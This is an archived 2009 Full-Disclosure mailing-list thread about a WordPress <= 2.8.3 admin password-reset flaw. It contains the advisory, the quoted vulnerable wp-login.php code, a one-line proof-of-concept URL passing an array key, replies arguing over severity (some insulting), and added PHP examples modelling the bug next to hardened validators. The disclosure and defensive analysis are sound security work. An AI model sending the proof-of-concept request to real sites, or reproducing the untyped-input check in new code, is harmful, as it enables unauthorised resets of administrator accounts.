Mailing List Archive

WordPress <= 2.8.3 Remote admin reset password
=============================================
- Release date: August 10th, 2009
- Discovered by: Laurent Gaffié
- Severity: Medium
=============================================

I. VULNERABILITY
-------------------------
WordPress <= 2.8.3 Remote admin reset password

II. BACKGROUND
-------------------------
WordPress is a state-of-the-art publishing platform with a focus on
aesthetics, web standards, and usability.
WordPress is both free and priceless at the same time.
More simply, WordPress is what you use when you want to work with your
blogging software, not fight it.

III. DESCRIPTION
-------------------------
The way WordPress handles a password reset looks like this:
You submit your email address or username via this form
/wp-login.php?action=lostpassword ;
WordPress sends you a reset confirmation like this via email:

"
Someone has asked to reset the password for the following site and username.
http://DOMAIN_NAME.TLD/wordpress
Username: admin
To reset your password visit the following address, otherwise just ignore
this email and nothing will happen

http://DOMAIN_NAME.TLD/wordpress/wp-login.php?action=rp&key=o7naCKN3OoeU2KJMMsag
"

You click on the link, and then WordPress resets your admin password, and
sends you another email with your new credentials.

Let's see how it works:


wp-login.php:
...[snip]....
line 186:
function reset_password($key) {
    global $wpdb;

    // Sanitising the request value: if $key arrives as an array, preg_replace()
    // returns an array, and the empty() check below does not reject it.
    $key = preg_replace('/[^a-z0-9]/i', '', $key);

    if ( empty( $key ) )
        return new WP_Error('invalid_key', __('Invalid key'));

    // Only the key is looked up; it is not tied to the account that requested the reset.
    $user = $wpdb->get_row($wpdb->prepare("SELECT * FROM $wpdb->users WHERE user_activation_key = %s", $key));
    if ( empty( $user ) )
        return new WP_Error('invalid_key', __('Invalid key'));
...[snip]....
line 276:
$action = isset($_REQUEST['action']) ? $_REQUEST['action'] : 'login';
$errors = new WP_Error();

if ( isset($_GET['key']) )
    $action = 'resetpass';

// validate action so as to default to the login screen
if ( !in_array($action, array('logout', 'lostpassword', 'retrievepassword', 'resetpass', 'rp', 'register', 'login')) && false === has_filter('login_form_' . $action) )
    $action = 'login';
...[snip]....

line 370:

    break;

case 'resetpass' :
case 'rp' :
    // $_GET['key'] is passed through untyped: it may be a string or an array.
    $errors = reset_password($_GET['key']);

    if ( ! is_wp_error($errors) ) {
        wp_redirect('wp-login.php?checkemail=newpass');
        exit();
    }

    wp_redirect('wp-login.php?action=lostpassword&error=invalidkey');
    exit();

    break;
...[snip ]...

You can abuse the password reset function, bypass the first step, and
then reset the admin password by submitting an array to the $key variable.


IV. PROOF OF CONCEPT
-------------------------
A web browser is sufficient to reproduce this proof of concept:
http://DOMAIN_NAME.TLD/wp-login.php?action=rp&key[]=
The password will be reset without any confirmation.

V. BUSINESS IMPACT
-------------------------
An attacker could exploit this vulnerability to compromise the admin account
of any wordpress/wordpress-mu <= 2.8.3

VI. SYSTEMS AFFECTED
-------------------------
All

VII. SOLUTION
-------------------------
No patch available for the moment.

VIII. REFERENCES
-------------------------
http://www.wordpress.org

IX. CREDITS
-------------------------
This vulnerability has been discovered by Laurent Gaffié
Laurent.gaffie{remove-this}(at)gmail.com
I'd like to shoot some greetz to securityreason.com for their great research
on PHP, and for this under-estimated vulnerability discovered by Maksymilian
Arciemowicz :
http://securityreason.com/achievement_securityalert/38

X. REVISION HISTORY
-------------------------
August 10th, 2009: Initial release

XI. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
I accept no responsibility for any damage caused by the use or
misuse of this information.
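An added example, not code from the advisory or from WordPress, that models the reset_password() validation quoted in section III: it shows why an array-typed key parameter survives the empty() check, what query shape results from it, and a hardened check that rejects non-string input and binds the key to the requesting login. The model_prepare() stand-in for $wpdb->prepare(), the matching_logins() helper and the sample user rows are assumptions constructed for this example.

```php
<?php
// Added example: not code from the advisory or from WordPress. It models the
// reset_password() validation quoted in section III to show why an
// array-typed "key" parameter passes it, beside a hardened variant of the check.

// Stand-in for $wpdb->prepare() (an assumption modelled on the 2.8-era helper,
// not the real class): %s placeholders are quoted and filled with vsprintf(),
// and a single array argument is unpacked as the argument list.
function model_prepare($query, $args) {
    if ( isset( $args[0] ) && is_array( $args[0] ) )
        $args = $args[0];
    $query = preg_replace('|(?<!%)%s|', "'%s'", $query);
    $args  = array_map('addslashes', $args);      // escaping stand-in
    return vsprintf($query, $args);
}

// Original shape of the check: sanitise, then reject only "empty" keys.
// Returns the SQL that would reach the database, or null when rejected.
function lookup_sql_original($key) {
    // preg_replace() applied to an array returns an array of results.
    $key = preg_replace('/[^a-z0-9]/i', '', $key);
    // empty() is false for array(''), because the array has one element,
    // so an array-typed key is not rejected here.
    if ( empty( $key ) )
        return null;                                  // "Invalid key"
    // The array is then unpacked by the prepare() model, so the placeholder is
    // filled with the empty string: the query matches every row whose
    // user_activation_key is '', i.e. every account with no pending reset.
    return model_prepare(
        "SELECT * FROM wp_users WHERE user_activation_key = %s", array($key));
}

// Hardened check: require a non-empty string and bind the key to the login
// that requested the reset, so an empty or foreign key matches nothing.
function lookup_sql_hardened($key, $login) {
    if ( ! is_string( $key ) || ! is_string( $login ) )
        return null;                                  // arrays stop here
    $key = preg_replace('/[^a-z0-9]/i', '', $key);
    if ( '' === $key )
        return null;
    return model_prepare(
        "SELECT * FROM wp_users WHERE user_activation_key = %s AND user_login = %s",
        array($key, $login));
}

// Apply a generated query to constructed sample rows (no database needed):
// a tiny matcher for the two WHERE shapes built above.
function matching_logins($sql, $rows) {
    preg_match_all("/(user_activation_key|user_login) = '([^']*)'/", $sql, $m, PREG_SET_ORDER);
    $hits = array();
    foreach ( $rows as $row ) {
        $ok = true;
        foreach ( $m as $cond )
            if ( $row[$cond[1]] !== $cond[2] ) $ok = false;
        if ( $ok ) $hits[] = $row['user_login'];
    }
    return $hits;
}

// Constructed sample data: the admin has no pending reset, bob has one.
$rows = array(
    array('user_login' => 'admin', 'user_activation_key' => ''),
    array('user_login' => 'bob',   'user_activation_key' => 'o7naCKN3OoeU2KJMMsag'),
);

// Inputs as PHP parses them from the query string:
$string_key = 'o7naCKN3OoeU2KJMMsag';   // ?key=o7naCKN3OoeU2KJMMsag
$array_key  = array('');                // ?key[]=

foreach ( array('string key' => $string_key, 'array key' => $array_key) as $label => $key ) {
    $sql = lookup_sql_original($key);
    echo "original, $label: ", $sql === null ? 'rejected' : implode(',', matching_logins($sql, $rows)), "\n";
    $sql = lookup_sql_hardened($key, 'bob');
    echo "hardened, $label: ", $sql === null ? 'rejected' : implode(',', matching_logins($sql, $rows)), "\n";
}
```

With the original check the array input selects the admin row, while the hardened check rejects it before any query is built and only ever matches the account that asked for the reset.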
Re: WordPress <= 2.8.3 Remote admin reset password [ In reply to ]
Errata:

"V. BUSINESS IMPACT
-------------------------
An attacker could exploit this vulnerability to compromise the admin account
of any wordpress/wordpress-mu <= 2.8.3"

-->

"V. BUSINESS IMPACT
-------------------------
An attacker could exploit this vulnerability to reset the admin account of
any wordpress/wordpress-mu <= 2.8.3"


Regards Laurent Gaffié


Re: WordPress <= 2.8.3 Remote admin reset password [ In reply to ]
Hi there,

This wasn't tested on the 2.7* branch.
It has been tested on the 2.8.* branch, with php 5.3.0 & php 5.2.9 as an
Apache 2.2.12 module, on a linux env.


Regards Laurent Gaffié



2009/8/10 Nicolas Valcárcel Scerpella <nicolas.valcarcel@canonical.com>

> I don't see the issue with wp 2.7.1
>
>
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
>
> --
> Nicolas Valcárcel
> Security Engineer
> Custom Engineering Solutions Group
> Canonical OEM Services
> Mobile: +511 994 293 200
> Key fingerprint = 5C4D 0C85 D9C0 98FE 11F9 DD12 524E C3CD EF58 4970
> gpg --keyserver keyserver.ubuntu.com --recv-keys 654597FE
>
Re: WordPress <= 2.8.3 Remote admin reset password [ In reply to ]
Oh ok.
Then, let's avoid that function.
If it's useless to have a function that validates a reset passwd before
resetting it, let's just avoid it smartass.


2009/8/10 Fabio N Sarmento [ Gmail ] <fabior2@gmail.com>

> There is no risk on this.
> It's just a little flaw, it doesn't break anything or put your admin access
> in risk.
>
> :-P to me , this vulnerability is more "BUZZ" than real deal. LOL
>
> --
>
> If you have questions please let me know.
> Best regards,
> - Fábio - IT Manager
>
Re: WordPress <= 2.8.3 Remote admin reset password [ In reply to ]
I'm guessing you're not a WordPress administrator, Fabio. Nice find
Laurent, as usual.

Re: WordPress <= 2.8.3 Remote admin reset password [ In reply to ]
Very nice Laurent. That will hurt many ppl

Re: WordPress <= 2.8.3 Remote admin reset password
Well, I don't think so, that's why I published this.
It's very limited.
It's true, someone can make a loop script and avoid any possibility of logging
back on to your wordpress blog, but you can also avoid that functionality
easily, you just need to comment out 1 line.
Anyway, a patch should come out soon.

Regards Laurent Gaffié




2009/8/10 ehmo <diskusie@gmail.com>

> Very nice Laurent. That will hurt many ppl
>
Re: WordPress <= 2.8.3 Remote admin reset password
Hi there,
"What would the "attacker" submit as a query to the server?"

Simply:
/wp-login.php?action=rp&key[]=

And the admin passwd would be reset.

Regards.


2009/8/11 Rafal M. Los <rafal@ishackingyou.com>

> Hi Laurent,
> Pardon my stupidity... I seem to be missing something tonight. Can
> you explain a little further for someone who doesn’t have coding (php)
> background? What would the "attacker" submit as a query to the server?
> What specifically triggers the vulnerability?
> .
>
> Rafal M. Los
> Security & IT Risk Strategist
>
> - Blog: http://preachsecurity.blogspot.com
> - LinkedIn: http://www.linkedin.com/in/rmlos
> - Twitter: http://twitter.com/RafalLos
>
> *From:* laurent gaffie <laurent.gaffie@gmail.com>
> *Sent:* Monday, August 10, 2009 9:09 PM
> *To:* full-disclosure@lists.grok.org.uk
> *Subject:* [Full-disclosure] WordPress <= 2.8.3 Remote admin reset
> password
>



--
follow me @twitter ! : http://twitter.com/laurentgaffie
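Laurent's one-line query works because PHP parses `key[]=` into an array, which the `reset_password()` check quoted in the advisory never rejects. The PHP below is an added example, not WordPress code or the project's patch: it reruns that check against a constructed in-memory user table, shows which account an array key ends up matching, and puts a type-strict version beside it. `bind_key()` is an assumption about how `$wpdb->prepare()` of that era unpacked an array argument, and `first_user_with_key()` stands in for `$wpdb->get_row()`.

```php
<?php
// Added example, not WordPress code: models the reset_password() key check
// quoted from wp-login.php (line 186) in this thread, shows why a query
// string of key[]= slips past it, and puts a hardened check beside it.

// Minimal stand-in for WP_Error so the script runs without WordPress.
class WP_Error {
    public $code;
    public $message;
    public function __construct($code, $message) {
        $this->code = $code;
        $this->message = $message;
    }
}

// Constructed stand-in for the wp_users table. An account that has not asked
// for a reset keeps an empty user_activation_key, which is the normal state.
$GLOBALS['users'] = array(
    array('ID' => 1, 'user_login' => 'admin',  'user_activation_key' => ''),
    array('ID' => 2, 'user_login' => 'editor', 'user_activation_key' => 'o7naCKN3OoeU2KJMMsag'),
);

// Assumption about $wpdb->prepare() of that era: when the first bound argument
// is itself an array, that array is taken as the whole argument list (as with
// vsprintf), so array('') binds the %s placeholder to the empty string.
function bind_key($key) {
    $args = array($key);
    if (is_array($args[0])) {
        $args = $args[0];
    }
    return isset($args[0]) ? (string) $args[0] : '';
}

// Stand-in for $wpdb->get_row(): the first row whose activation key matches.
function first_user_with_key($bound) {
    foreach ($GLOBALS['users'] as $u) {
        if ($u['user_activation_key'] === $bound) {
            return $u;
        }
    }
    return null;
}

// The original check, as quoted in the advisory, minus the real database.
function reset_password_original($key) {
    $key = preg_replace('/[^a-z0-9]/i', '', $key); // array in, array out
    if (empty($key)) {                             // array('') is not "empty"
        return new WP_Error('invalid_key', 'Invalid key');
    }
    // array('') becomes the argument list, %s binds to '', and the query
    // matches the first account with no pending reset: usually ID 1, admin.
    $user = first_user_with_key(bind_key($key));
    if (empty($user)) {
        return new WP_Error('invalid_key', 'Invalid key');
    }
    return $user;
}

// Hardened check (added here, not the project's own patch): the key must be a
// non-empty string, and an empty activation key must never match any row.
function reset_password_hardened($key) {
    if (!is_string($key)) {
        return new WP_Error('invalid_key', 'Invalid key');
    }
    $key = preg_replace('/[^a-z0-9]/i', '', $key);
    if ($key === '') {
        return new WP_Error('invalid_key', 'Invalid key');
    }
    $user = first_user_with_key($key);
    if ($user === null || $user['user_activation_key'] === '') {
        return new WP_Error('invalid_key', 'Invalid key');
    }
    return $user;
}

// Constructed requests: the key from a genuine reset e-mail, and the query
// string from the proof of concept, which PHP parses into $_GET['key'] = array('').
foreach (array('key=o7naCKN3OoeU2KJMMsag', 'key[]=') as $qs) {
    parse_str($qs, $get);
    foreach (array('reset_password_original', 'reset_password_hardened') as $fn) {
        $result = $fn($get['key']);
        $outcome = ($result instanceof WP_Error) ? 'rejected' : 'resets ' . $result['user_login'];
        printf("%-24s %-25s %s\n", $fn, $qs, $outcome);
    }
}
```

Run it with `php` from the command line; the original check accepts the array and lands on the admin row, while the hardened one rejects it and still accepts the genuine key.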
Re: WordPress <= 2.8.3 Remote admin reset password
"Rafal M. Los
Security & IT Risk Strategist"

where ?

@home ?
oh boy.



2009/8/11 Rafal M. Los <rafal@ishackingyou.com>

> Empty reply... on purpose or...?
> .
>
> Rafal
>
> *From:* laurent gaffie <laurent.gaffie@gmail.com>
> *Sent:* Monday, August 10, 2009 11:43 PM
> *To:* Rafal M. Los <rafal@ishackingyou.com>
> *Subject:* Re: [Full-disclosure] WordPress <= 2.8.3 Remote admin reset
> password
>
>
>
> 2009/8/11 Rafal M. Los <rafal@ishackingyou.com>
>



--
follow me @twitter ! : http://twitter.com/laurentgaffie
Re: WordPress <= 2.8.3 Remote admin reset password
Dude, your email is more funny, than serious.
It's a pure troll.
Whatever from now on.
Re: WordPress <= 2.8.3 Remote admin reset password
Mr Fabio,

You dont even understand the bug, so please shut the hell up.






2009/8/11 Fabio N Sarmento [ Gmail ] <fabior2@gmail.com>

> if this is a bug, please close Twitter.com, MSN.com and other services,
> because they have the same stupid "Reset password" service.
>
> So please make my day, and create a stupid script to flood with multiple
> request to reset password.
>
> LOL
>
> 2009/8/10 Jeremy Brown <0xjbrown41@gmail.com>
>
> I'm guessing you're not a Wordpress administrator, Fabio. Nice find
>> Laurent, as usual.
>>
>> On Mon, Aug 10, 2009 at 10:48 PM, laurent
>> gaffie<laurent.gaffie@gmail.com> wrote:
>> > Oh ok.
>> > Then, let's avoid that function.
>> > If it's useless to have a function that validates a reset passwd before
>> > resetting it, let's just avoid it smartass.
>> >
>> >
>> > 2009/8/10 Fabio N Sarmento [ Gmail ] <fabior2@gmail.com>
>> >>
>> >> There is no risk on this.
>> >> It's just a little flaw, it doesn't break anything or put your admin
>> >> access in risk.
>> >>
>> >> :-P to me, this vulnerability is more "BUZZ" than real deal. LOL
>> >>
>> >> 2009/8/10 laurent gaffie <laurent.gaffie@gmail.com>
>> >>>
>> >>> Hi there,
>> >>>
>> >>> This wasn't tested on the 2.7* branch.
>> >>> It has been tested on the 2.8.* branch, with php 5.3.0 & php 5.2.9 as
>> an
>> >>> Apache 2.2.12 module, on a linux env.
>> >>>
>> >>>
>> >>> Regards Laurent Gaffié
>> >>>
>> >>>
>> >>>
>> >>> 2009/8/10 Nicolas Valcárcel Scerpella <
>> nicolas.valcarcel@canonical.com>
>> >>>>
>> >>>> I don't see the issue with wp 2.7.1
>> >>>>
>> >>>> On Mon, 10 Aug 2009, laurent gaffie wrote:
>> >>>>
>> >>>> > Errata:
>> >>>> >
>> >>>> > "V. BUSINESS IMPACT
>> >>>> > -------------------------
>> >>>> > An attacker could exploit this vulnerability to compromise the
>> admin
>> >>>> > account
>> >>>> > of any wordpress/wordpress-mu <= 2.8.3"
>> >>>> >
>> >>>> > -->
>> >>>> >
>> >>>> > "V. BUSINESS IMPACT
>> >>>> > -------------------------
>> >>>> > An attacker could exploit this vulnerability to reset the admin
>> >>>> > account of
>> >>>> > any wordpress/wordpress-mu <= 2.8.3"
>> >>>> >
>> >>>> >
>> >>>> > Regards Laurent Gaffié
>> >>>> >
>> >>>> >



--
follow me @twitter ! : http://twitter.com/laurentgaffie
Re: WordPress <= 2.8.3 Remote admin reset password
Bug is confirmed...

WP team already issued and a patch
http://core.trac.wordpress.org/changeset/11798

Nice find.

Regards

2009/8/11 laurent gaffie <laurent.gaffie@gmail.com>:
> Mr Fabio,
>
> You dont even understand the bug, so please shut the hell up.
>
>
>
>
>
>
> 2009/8/11 Fabio N Sarmento [ Gmail ] <fabior2@gmail.com>
>>
>> if this is a bug, please close Twitter.com, MSN.com and other services,
>> because they have the same stupid "Reset password" service.
>>
>> So please make my day, and create a stupid script to flood with multiple
>> request to reset password.
>>
>> LOL
>>
>> 2009/8/10 Jeremy Brown <0xjbrown41@gmail.com>
>>>
>>> I'm guessing you're not a Wordpress administrator, Fabio. Nice find
>>> Laurent, as usual.
>>>
>>> On Mon, Aug 10, 2009 at 10:48 PM, laurent
>>> gaffie<laurent.gaffie@gmail.com> wrote:
>>> > Oh ok.
>>> > Then, let's avoid that function.
>>> > If it's useless to have a function that validates a reset password before
>>> > resetting it, let's just avoid it smartass.
>>> >
>>> >
>>> > 2009/8/10 Fabio N Sarmento [ Gmail ] <fabior2@gmail.com>
>>> >>
>>> >> There is no risk on this.
>>> >> It's just a little flaw, it doesn't break anything or put your admin
>>> >> access at risk.
>>> >>
>>> >> :-P to me, this vulnerability is more "BUZZ" than real deal. LOL
>>> >>
>>> >> 2009/8/10 laurent gaffie <laurent.gaffie@gmail.com>
>>> >>>
>>> >>> Hi there,
>>> >>>
>>> >>> This wasn't tested on the 2.7* branch.
>>> >>> It has been tested on the 2.8.* branch, with php 5.3.0 & php 5.2.9 as
>>> >>> an Apache 2.2.12 module, on a linux env.
>>> >>>
>>> >>>
>>> >>> Regards Laurent Gaffié
>>> >>>
>>> >>>
>>> >>>
>>> >>> 2009/8/10 Nicolas Valcárcel Scerpella
>>> >>> <nicolas.valcarcel@canonical.com>
>>> >>>>
>>> >>>> I don't see the issue with wp 2.7.1
>>> >>>>
>>> >>>> On Mon, 10 Aug 2009, laurent gaffie wrote:
>>> >>>>
>>> >>>> > Errata:
>>> >>>> >
>>> >>>> > "V. BUSINESS IMPACT
>>> >>>> > -------------------------
>>> >>>> > An attacker could exploit this vulnerability to compromise the
>>> >>>> > admin account of any wordpress/wordpress-mu <= 2.8.3"
>>> >>>> >
>>> >>>> > -->
>>> >>>> >
>>> >>>> > "V. BUSINESS IMPACT
>>> >>>> > -------------------------
>>> >>>> > An attacker could exploit this vulnerability to reset the admin
>>> >>>> > account of any wordpress/wordpress-mu <= 2.8.3"
>>> >>>> >
>>> >>>> >
>>> >>>> > Regards Laurent Gaffié
>>> >>>> >
>>> >>>> >
>>> >>>> > 2009/8/10 laurent gaffie <laurent.gaffie@gmail.com>
>>> >>>> >
>>> >>>> > > =============================================
>>> >>>> > > - Release date: August 10th, 2009
>>> >>>> > > - Discovered by: Laurent Gaffié
>>> >>>> > > - Severity: Medium
>>> >>>> > > =============================================
>>> >>>> > >
>>> >>>> > > I. VULNERABILITY
>>> >>>> > > -------------------------
>>> >>>> > > WordPress <= 2.8.3 Remote admin reset password
>>> >>>> > >
>>> >>>> > > II. BACKGROUND
>>> >>>> > > -------------------------
>>> >>>> > > WordPress is a state-of-the-art publishing platform with a focus
>>> >>>> > > on aesthetics, web standards, and usability.
>>> >>>> > > WordPress is both free and priceless at the same time.
>>> >>>> > > More simply, WordPress is what you use when you want to work
>>> >>>> > > with your blogging software, not fight it.
>>> >>>> > >
>>> >>>> > > III. DESCRIPTION
>>> >>>> > > -------------------------
>>> >>>> > > The way Wordpress handles a password reset looks like this:
>>> >>>> > > You submit your email address or username via this form
>>> >>>> > > /wp-login.php?action=lostpassword ;
>>> >>>> > > Wordpress sends you a reset confirmation like this via email:
>>> >>>> > >
>>> >>>> > > "
>>> >>>> > > Someone has asked to reset the password for the following site
>>> >>>> > > and username.
>>> >>>> > > http://DOMAIN_NAME.TLD/wordpress
>>> >>>> > > Username: admin
>>> >>>> > > To reset your password visit the following address, otherwise
>>> >>>> > > just ignore this email and nothing will happen
>>> >>>> > >
>>> >>>> > > http://DOMAIN_NAME.TLD/wordpress/wp-login.php?action=rp&key=o7naCKN3OoeU2KJMMsag
>>> >>>> > > "
>>> >>>> > >
>>> >>>> > > You click on the link, and then Wordpress resets your admin password,
>>> >>>> > > and sends you another email with your new credentials.
>>> >>>> > >
>>> >>>> > > Let's see how it works:
>>> >>>> > >
>>> >>>> > >
>>> >>>> > > wp-login.php:
>>> >>>> > > ...[snip]....
>>> >>>> > > line 186:
>>> >>>> > > function reset_password($key) {
>>> >>>> > >     global $wpdb;
>>> >>>> > >
>>> >>>> > >     $key = preg_replace('/[^a-z0-9]/i', '', $key);
>>> >>>> > >
>>> >>>> > >     if ( empty( $key ) )
>>> >>>> > >         return new WP_Error('invalid_key', __('Invalid key'));
>>> >>>> > >
>>> >>>> > >     $user = $wpdb->get_row($wpdb->prepare("SELECT * FROM $wpdb->users WHERE user_activation_key = %s", $key));
>>> >>>> > >     if ( empty( $user ) )
>>> >>>> > >         return new WP_Error('invalid_key', __('Invalid key'));
>>> >>>> > > ...[snip]....
>>> >>>> > > line 276:
>>> >>>> > > $action = isset($_REQUEST['action']) ? $_REQUEST['action'] : 'login';
>>> >>>> > > $errors = new WP_Error();
>>> >>>> > >
>>> >>>> > > if ( isset($_GET['key']) )
>>> >>>> > >     $action = 'resetpass';
>>> >>>> > >
>>> >>>> > > // validate action so as to default to the login screen
>>> >>>> > > if ( !in_array($action, array('logout', 'lostpassword', 'retrievepassword', 'resetpass', 'rp', 'register', 'login')) && false === has_filter('login_form_' . $action) )
>>> >>>> > >     $action = 'login';
>>> >>>> > > ...[snip]....
>>> >>>> > >
>>> >>>> > > line 370:
>>> >>>> > >
>>> >>>> > > break;
>>> >>>> > >
>>> >>>> > > case 'resetpass' :
>>> >>>> > > case 'rp' :
>>> >>>> > >     $errors = reset_password($_GET['key']);
>>> >>>> > >
>>> >>>> > >     if ( ! is_wp_error($errors) ) {
>>> >>>> > >         wp_redirect('wp-login.php?checkemail=newpass');
>>> >>>> > >         exit();
>>> >>>> > >     }
>>> >>>> > >
>>> >>>> > >     wp_redirect('wp-login.php?action=lostpassword&error=invalidkey');
>>> >>>> > >     exit();
>>> >>>> > >
>>> >>>> > > break;
>>> >>>> > > ...[snip ]...
>>> >>>> > >
>>> >>>> > > You can abuse the password reset function, bypass the first step
>>> >>>> > > and then reset the admin password by submitting an array to the $key
>>> >>>> > > variable.
>>> >>>> > >
>>> >>>> > >
>>> >>>> > > IV. PROOF OF CONCEPT
>>> >>>> > > -------------------------
>>> >>>> > > A web browser is sufficient to reproduce this Proof of concept:
>>> >>>> > >
>>> >>>> > >
>>> >>>> > > http://DOMAIN_NAME.TLD/wp-login.php?action=rp&key[]=
>>> >>>> > > The password will be reset without any confirmation.
>>> >>>> > >
>>> >>>> > > V. BUSINESS IMPACT
>>> >>>> > > -------------------------
>>> >>>> > > An attacker could exploit this vulnerability to compromise the
>>> >>>> > > admin account of any wordpress/wordpress-mu <= 2.8.3
>>> >>>> > >
>>> >>>> > > VI. SYSTEMS AFFECTED
>>> >>>> > > -------------------------
>>> >>>> > > All
>>> >>>> > >
>>> >>>> > > VII. SOLUTION
>>> >>>> > > -------------------------
>>> >>>> > > No patch available for the moment.
>>> >>>> > >
>>> >>>> > > VIII. REFERENCES
>>> >>>> > > -------------------------
>>> >>>> > > http://www.wordpress.org
>>> >>>> > >
>>> >>>> > > IX. CREDITS
>>> >>>> > > -------------------------
>>> >>>> > > This vulnerability has been discovered by Laurent Gaffié
>>> >>>> > > Laurent.gaffie{remove-this}(at)gmail.com
>>> >>>> > > I'd like to shoot some greetz to securityreason.com for their great
>>> >>>> > > research on PHP, as for this under-estimated vulnerability
>>> >>>> > > discovered by Maksymilian Arciemowicz :
>>> >>>> > > http://securityreason.com/achievement_securityalert/38
>>> >>>> > >
>>> >>>> > > X. REVISION HISTORY
>>> >>>> > > -------------------------
>>> >>>> > > August 10th, 2009: Initial release
>>> >>>> > >
>>> >>>> > > XI. LEGAL NOTICES
>>> >>>> > > -------------------------
>>> >>>> > > The information contained within this advisory is supplied "as-is"
>>> >>>> > > with no warranties or guarantees of fitness of use or otherwise.
>>> >>>> > > I accept no responsibility for any damage caused by the use or
>>> >>>> > > misuse of this information.
>>> >>>> > >
>>> >>>>
>>> >>>>
>>> >>>> --
>>> >>>> Nicolas Valcárcel
>>> >>>> Security Engineer
>>> >>>> Custom Engineering Solutions Group
>>> >>>> Canonical OEM Services
>>> >>>> Mobile: +511 994 293 200
>>> >>>> Key fingerprint = 5C4D 0C85 D9C0 98FE 11F9  DD12 524E C3CD EF58 4970
>>> >>>> gpg --keyserver keyserver.ubuntu.com --recv-keys 654597FE
>>> >>>>
>>> >>>> -----BEGIN PGP SIGNATURE-----
>>> >>>> Version: GnuPG v1.4.9 (GNU/Linux)
>>> >>>>
>>> >>>> iQEcBAEBCAAGBQJKgNe5AAoJEFJOw83vWElwLj4H/3dk7RW9WJoUpzI6E5QKdXsF
>>> >>>> 7uNeGL8Yho9RZuPEK93IecImLa25Jy7KhzL+P4FfCCyYXVG8hxaUlUQss77PhsjK
>>> >>>> VG/YkDChiNJi2tj7jixcdpVy7MLiDxMiHBGNSzI2piBiZb3/toSBvZslSW2yqgIk
>>> >>>> OkqbJ7AE5yTu4sulhO29DRYzFUjvZHGKR2akRu/3RlOUHhwVDJw0m2ZO4M3MHz4+
>>> >>>> 1x/w7HhzmbMo/kioxJpPsU7f+axVnRMia9dZmvakfhmNdht98qAE/a7UlpT+ft1w
>>> >>>> Vua7DRYwOn4o5UYXhBmUL/uCUt3CLeT9Jgu0/bWZ3G3gR1Rw1edS7E5Q7A9wlEY=
>>> >>>> =UdOl
>>> >>>> -----END PGP SIGNATURE-----
>>> >>>>
>>> >>>
>>> >>>
>>> >>
>>> >>
>>> >>
>>> >> --
>>> >>
>>> >> If you have questions please let me know.
>>> >> Best regards,
>>> >> - Fábio - IT Manager
>>> >
>>> >
>>> >
>>> >
>>>
>>
>>
>>
>> --
>>
>> If you have questions please let me know.
>> Best regards,
>> - Fábio - IT Manager
>
>
>
> --
> follow me @twitter ! : http://twitter.com/laurentgaffie
>
>



--
/**
CONFIDENTIALITY NOTICE: This message is intended to be viewed only by
the listed recipient(s).
It may contain information that is privileged, confidential and/or
exempt from disclosure under applicable law.
Any dissemination, distribution or copying of this message is strictly
prohibited without our prior written permission.
If you are not an intended recipient, or if you have received this
communication in error, please notify us immediately by return e-mail
and permanently remove the original message and any copies from your
computer and all back-up systems.
*/
_________________________
g30rg3_x

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
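The advisory quoted in this thread shows why the two checks in reset_password() do not stop an array: preg_replace() accepts an array subject and returns an array, and empty() is false for a one-element array such as the array('') that key[]= produces, so the value reaches the database query unchanged. The following is an added example, not code from the original post, from WordPress, or from the changeset linked above; advisory_checks_pass() reproduces only the two checks from the quoted snippet, validate_reset_key() is a hypothetical hardened validator, and the assumption that a key is exactly 20 alphanumeric characters is taken from the sample URL in the advisory's e-mail.

```php
<?php
// Added example, not WordPress code: the advisory's own key checks next to a
// validator that rejects the array input the advisory describes.

// The two checks from the quoted reset_password(), on their own so their
// behaviour on an array can be observed. Returns true when both pass.
function advisory_checks_pass($key): bool
{
    // preg_replace() with an array subject returns an array, not a string.
    $key = preg_replace('/[^a-z0-9]/i', '', $key);
    // empty(array('')) is false: a one-element array is not "empty".
    return !empty($key);
}

// Hypothetical hardened validator (not the WordPress patch).
// Returns the key string, or null when the input must be rejected.
function validate_reset_key($key): ?string
{
    // A parameter written as key[]=... arrives as an array. A reset key is
    // always a single string, so any other type is rejected before anything
    // else looks at it.
    if (!is_string($key)) {
        return null;
    }
    // Match the exact alphabet and length instead of stripping characters:
    // stripping turns malformed input into a "valid" key. The length of 20 is
    // an assumption taken from the sample URL in the advisory.
    if (!preg_match('/^[A-Za-z0-9]{20}$/', $key)) {
        return null;
    }
    return $key;
}

// Constructed inputs: the key from the advisory's sample e-mail, the array
// produced by key[]=, an empty string, and a key padded with stray characters.
$samples = [
    'sample key'     => 'o7naCKN3OoeU2KJMMsag',
    'array (key[]=)' => [''],
    'empty string'   => '',
    'stray chars'    => "o7na'CKN3 OoeU2KJMMsag",
];

foreach ($samples as $label => $input) {
    printf(
        "%-16s advisory checks: %-5s hardened: %s\n",
        $label,
        advisory_checks_pass($input) ? 'pass' : 'fail',
        validate_reset_key($input) === null ? 'reject' : 'accept'
    );
}
```

Run from the php CLI, the table shows the array and the padded key passing the advisory's checks while only the well-formed sample key survives the hardened validator. The type check belongs at the boundary where $_GET['key'] is read, before the value is handed to any query; verifying the real fix is a matter of reading the changeset the reply above links to rather than this example.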